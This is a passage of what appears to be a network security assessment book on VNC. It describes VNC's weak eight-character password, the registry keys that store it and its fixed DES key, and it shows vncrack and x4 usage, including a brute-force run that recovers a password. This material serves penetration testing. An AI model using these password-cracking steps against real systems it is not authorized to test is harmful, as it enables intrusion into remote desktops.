7.7 VNC

AT&T's Virtual Network Computing (VNC) package is available from http://www.uk.research.att.com/vnc/. VNC is a free and simple remote desktop access system for Windows, and it runs over the following TCP ports:

  • Port 5800 for HTTP access to VNC using a Java client through a web browser

  • Port 5900 for direct access to VNC using the native vncviewer.exe

From a security perspective, VNC is relatively straightforward to compromise. A major issue with VNC security is its authentication mechanism, shown in Figure 7-3.

Figure 7-3. VNC authentication relies on a single password
figs/NSA_0703.gif

VNC requires only one piece of data for authentication purposes: a session password with a maximum length of eight characters. On the target server, the VNC password string is stored in the Windows registry under the following keys:

\HKEY_CURRENT_USER\Software\ORL\WinVNC3

\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3

A fixed key encrypts the VNC password using DES, so if an attacker gains read access to the system registry across the network (often accessible on poorly protected Windows hosts) she can compromise the VNC session password. The fixed key is found in the VNC source code (0x238210763578887 at the time of writing).

7.7.1 VNC Brute-Force Password Grinding

vncrack by FX of Phenoelit is a Unix-based VNC cracking utility that's available from http://www.phenoelit.de/vncrack/. You can use vncrack to perform decryption of the VNC session password retrieved from the system registry, as well as active brute force against the VNC service over a network.

The VNC handshake can be sniffed, and the session password compromised using the Unix-based phoss network sniffing utility, available from Phenoelit at http://www.phenoelit.de/phoss/.

Example 7-17 shows the usage of the Unix-based vncrack utility.

Example 7-17. Using vncrack
# ./vncrack

VNCrack

$Id: ch07.xml,v 1.4 2004/04/02 23:01:01 chodacki Exp $

by Phenoelit (http://www.phenoelit.de/)



Usage:

Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]

Passwd: ./vncrack -C /home/some/user/.vnc/passwd

Windows interactive mode: ./vncrack -W

        enter hex key one byte per line - find it in

        \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or

        \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password



Options for online mode:

-v      verbose

-d N    Sleep N nanoseconds between each try

-D N    Sleep N seconds between each try

-a      Just a funny thing

-p P    connect to port P instead of 5900

-s N    Sleep N seconds in case connect( ) failed

Options for PHoss intercepted challenges:

-c <challenge>  challenge from PHoss output

-r <response>   response from PHoss output

By specifying the challenge and response traffic siphoned by phoss, the tool can instantly compromise sniffed session passwords also. Example 7-18 shows that the VNC session password for 192.168.189.120 is control after launching a brute-force attack.

Example 7-18. Brute-forcing the VNC password with vncrack
# ./vncrack -h 192.168.189.120 -w common.txt

VNCrack - by Phenoelit (http://www.phenoelit.de/)

$Revision: 1.4 $

Server told me: connection close

Server told me: connection close



>>>>>>>>>>>>>>>

Password: control

>>>>>>>>>>>>>>>

The vncrack tool has been ported and compiled for Win32 environments, titled x4. Example 7-19 shows the x4 command-line options.

Example 7-19. The Win32 port of vncrack, x4
D:\phenoelit> x4

VNCrackX4

by Phenoelit (http://www.phenoelit.de/)



Usage:

Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]

Windows interactive mode: ./vncrack -W

        enter hex key one byte per line - find it in

        \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password or

        \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password



Options for online mode:

-v      verbose (repeat -v for more)

-p P    connect to port P instead of 5900

Options for PHoss intercepted challages:

-c <challange>  challange from PHoss output

-r <response>   response from PHoss output

If the Phenoelit site is down or no longer archives these tools, these tools are available at the following locations:

http://examples.oreilly.com/networksa/tools/vncrack_src.tar.gz
http://examples.oreilly.com/networksa/tools/x4.exe


     
    ASPTreeView.com
     
    Evaluation has ГЪО»ФШГМ№Гexpired.
    Info...